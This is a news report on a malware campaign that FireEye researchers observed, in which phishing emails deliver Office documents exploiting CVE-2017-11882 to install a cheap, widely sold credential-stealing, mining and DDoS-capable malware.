Hackers are exploiting vulnerabilities in Microsoft Office software to spread a sophisticated form of malware that’s capable of stealing credentials, dropping additional malware, cryptocurrency mining, and conducting distributed denial-of-service (DDoS) attacks.
The malware has been active since 2016 and, despite its powerful capabilities, it’s available to purchase on underground forums for as little as $75.
Researchers at FireEye have observed a new campaign attempting to deliver the malware via spam emails to targets in the telecommunications, insurance, and financial services industries, with all of these attacks attempting to exploit recent vulnerabilities uncovered in Microsoft Office software.
The phishing emails are designed to be relevant to the selected target and include a ZIP file containing a malicious lure document, which users are encouraged to open. Once the Microsoft Office document file is accessed, the Office vulnerabilities are exploited and the PowerShell-based payload is run, infecting the victim.
One of the vulnerabilities exploited by the attackers is CVE-2017-11882. Disclosed in December, it’s a security vulnerability in Microsoft Office which enables arbitrary code to run when a maliciously-modified file is opened. In the case of this campaign, the vulnerability allows an additional download to be triggered using a stored URL within the malicious attachment. The download contains the PowerShell script which drops the malware.
If the PowerShell script is successfully run, it injects code which downloads the final payload from the malicious command and control server, which unpacks the malware onto the target computer, alongside functions which allow the attacker to use Tor to hide their tracks. The malware also contains various plugins allowing the attackers to secretly gain access to almost every type of data stored on the machine.
Among the features the malware offers attackers are the ability to steal passwords from popular web browsers, steal passwords from FTP applications and steal passwords from email accounts.
The malware can also steal from cryptocurrency wallets and steal licence keys of more than 200 popular software applications, including Office, SQL Server, Adobe, and Nero.
In addition to being able to steal from an infected user, the attackers can also rope the infected machine into a larger network of computers to help carry DDoS attacks and also use the machines as a tool for mining cryptocurrency. The malware is advertised across a range of popular underground forums.
To read the original article: